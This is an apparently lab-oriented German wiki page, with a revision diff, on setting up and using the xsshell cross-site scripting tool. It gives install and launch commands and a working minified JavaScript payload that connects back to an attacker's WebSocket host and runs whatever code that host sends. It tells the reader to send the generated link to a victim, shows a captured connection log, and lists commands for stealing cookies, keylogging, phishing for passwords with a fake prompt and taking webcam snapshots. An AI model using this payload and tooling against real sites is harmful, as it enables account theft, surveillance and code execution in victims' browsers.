Xsshell: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 47: Zeile 47:
  
 
=Auf dem Client=
 
=Auf dem Client=
 
+
xsshell
[[Datei:Xss-poc-js-sh1.png]]
+
listening for sockets on port , at url path: /s
 +
starting console
 +
type \? to list available commands
 +
xsshell >
 +
xsshell > \?
 +
xsshell > \help \? \h: list available commands
 +
xsshell > \alert:      send an alert message to the target set
 +
xsshell >                  usage: \alert ALERT_MESSAGE
 +
xsshell > \cs:        get the current cookies from the target set's current page and any cookie updates.
 +
xsshell > \ct:        crash the target set's tab
 +
xsshell > \emd:        return a list of media devices accessible to the target set's browser
 +
xsshell > \ex:        print out the client exploit javascript
 +
xsshell > \exm:        print out the minified version of the client exploit javascript
 +
xsshell > \gi:        download all images on the target set's page.
 +
xsshell >              images will be stored in DOWNLOAD_DIR.
 +
xsshell >              relative file paths are relative to the path provided to -wrkdir
 +
xsshell >                  usage: \gi [DOWNLOAD_DIR]
 +
xsshell >                  examples:
 +
xsshell >                      \gi
 +
xsshell >                      \gi /tmp/images
 +
xsshell >                      \gi imgdir
 +
xsshell > \kl:        start a keylogger on the target set
 +
xsshell > \ll:        list out any links found on the target set's currently open page
 +
xsshell > \pfl:        open a modal on the target set's page prompting them for a username and password
 +
xsshell > \ps:        print out socket info for all actively connected websockets
 +
xsshell > \q:          exit this program
 +
xsshell > \sf:        send a javascript file to the target set and execute it.
 +
xsshell >              any data can be returned from the target set by calling `this.send(\"return data string\");` in the script.
 +
xsshell >              relative file paths are relative to the path provided to -wrkdir
 +
xsshell >                  usage: \sf FILE_PATH
 +
xsshell > \sfl:        resend the last file that was sent using \sf, includes any new changes to the file
 +
xsshell > \src:        get the target set's currently rendered page source
 +
xsshell > \st:        set the websockets to target. one or more targets can be set with the following methods:
 +
xsshell >              *        -targets all active websocket connections (default target set)
 +
xsshell >              8        -target a single websocket connection belonging to that id number
 +
xsshell >              1,2,8,10 -targets all websocket IDs in the comma separated list
 +
xsshell >              4-16    -targets all websocket IDs from the lowest number listed to the highest number listed
 +
xsshell >              4-      -targets all websocket IDs that are greater than or equal to the listed number
 +
xsshell >              -16      -targets all websocket IDs that are less than or equal to the listed number
 +
xsshell >                  usage: \st TARGET_SET
 +
xsshell >                  examples:
 +
xsshell >                      \st *
 +
xsshell >                      \st 2
 +
xsshell >                      \st 2,4,7
 +
xsshell >                      \st 10-15
 +
xsshell >                      \st 6-
 +
xsshell >                      \st -100
 +
xsshell > \wcs:        attempt to take a snapshot from the target set's webcam, if one is available.
 +
xsshell >              images will be stored in DOWNLOAD_DIR.  
 +
xsshell >              relative file paths are relative to the path provided to -wrkdir.
 +
xsshell >              NOTE: using this command may prompt the target set for webcam access.
 +
xsshell >              the target set may reject the prompt, or ignore it entirely.
 +
xsshell >                  usage: \ws [DOWNLOAD_DIR]
 +
xsshell >                  examples:
 +
xsshell >                      \wcs /tmp/webcam_snaps
 +
xsshell >                      \wcs snaps
 +
xsshell > \xhr:        send an xhr request from the target set's current page
 +
xsshell >                  usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]
 +
xsshell >                  examples:
 +
xsshell >                      \xhr GET https://google.com/
 +
xsshell >                      \xhr POST https://google.com/ application/json {"hello": "world"}
 +
xsshell >
  
 
=Links=
 
=Links=
 
*https://github.com/shelld3v/JSshell/blob/master/README.md
 
*https://github.com/shelld3v/JSshell/blob/master/README.md

Version vom 28. Juli 2021, 12:52 Uhr

git clone

  • sudo apt-get install go
  • go get github.com/raz-varren/xsshell
  • go install github.com/raz-varren/xsshell

start

  • ./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell: 

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

  • Payload muss ins Eingabefeld
  • Generierter Link wird zum Opfer geschickt


JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

Die Shell

start socket: 1, header: AqHFTtA

socket connected: 1 

   user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 
   page url:   http://127.0.0.1/xss.php?msg=?

   referrer:   http://127.0.0.1/xss.php?msg=?
   cookies:
end socket: 1, header: AqHFTtA

Auf dem Client

xsshell listening for sockets on port , at url path: /s starting console type \? to list available commands xsshell > xsshell > \? xsshell > \help \? \h: list available commands xsshell > \alert: send an alert message to the target set xsshell > usage: \alert ALERT_MESSAGE xsshell > \cs: get the current cookies from the target set's current page and any cookie updates. xsshell > \ct: crash the target set's tab xsshell > \emd: return a list of media devices accessible to the target set's browser xsshell > \ex: print out the client exploit javascript xsshell > \exm: print out the minified version of the client exploit javascript xsshell > \gi: download all images on the target set's page. xsshell > images will be stored in DOWNLOAD_DIR. xsshell > relative file paths are relative to the path provided to -wrkdir xsshell > usage: \gi [DOWNLOAD_DIR] xsshell > examples: xsshell > \gi xsshell > \gi /tmp/images xsshell > \gi imgdir xsshell > \kl: start a keylogger on the target set xsshell > \ll: list out any links found on the target set's currently open page xsshell > \pfl: open a modal on the target set's page prompting them for a username and password xsshell > \ps: print out socket info for all actively connected websockets xsshell > \q: exit this program xsshell > \sf: send a javascript file to the target set and execute it. xsshell > any data can be returned from the target set by calling `this.send(\"return data string\");` in the script. xsshell > relative file paths are relative to the path provided to -wrkdir xsshell > usage: \sf FILE_PATH xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file xsshell > \src: get the target set's currently rendered page source xsshell > \st: set the websockets to target. one or more targets can be set with the following methods: xsshell > * -targets all active websocket connections (default target set) xsshell > 8 -target a single websocket connection belonging to that id number xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list xsshell > 4-16 -targets all websocket IDs from the lowest number listed to the highest number listed xsshell > 4- -targets all websocket IDs that are greater than or equal to the listed number xsshell > -16 -targets all websocket IDs that are less than or equal to the listed number xsshell > usage: \st TARGET_SET xsshell > examples: xsshell > \st * xsshell > \st 2 xsshell > \st 2,4,7 xsshell > \st 10-15 xsshell > \st 6- xsshell > \st -100 xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available. xsshell > images will be stored in DOWNLOAD_DIR. xsshell > relative file paths are relative to the path provided to -wrkdir. xsshell > NOTE: using this command may prompt the target set for webcam access. xsshell > the target set may reject the prompt, or ignore it entirely. xsshell > usage: \ws [DOWNLOAD_DIR] xsshell > examples: xsshell > \wcs /tmp/webcam_snaps xsshell > \wcs snaps xsshell > \xhr: send an xhr request from the target set's current page xsshell > usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY] xsshell > examples: xsshell > \xhr GET https://google.com/ xsshell > \xhr POST https://google.com/ application/json {"hello": "world"} xsshell >

Links

Abgerufen von „http://wiki.ixheim.de/index.php?title=Xsshell&oldid=26281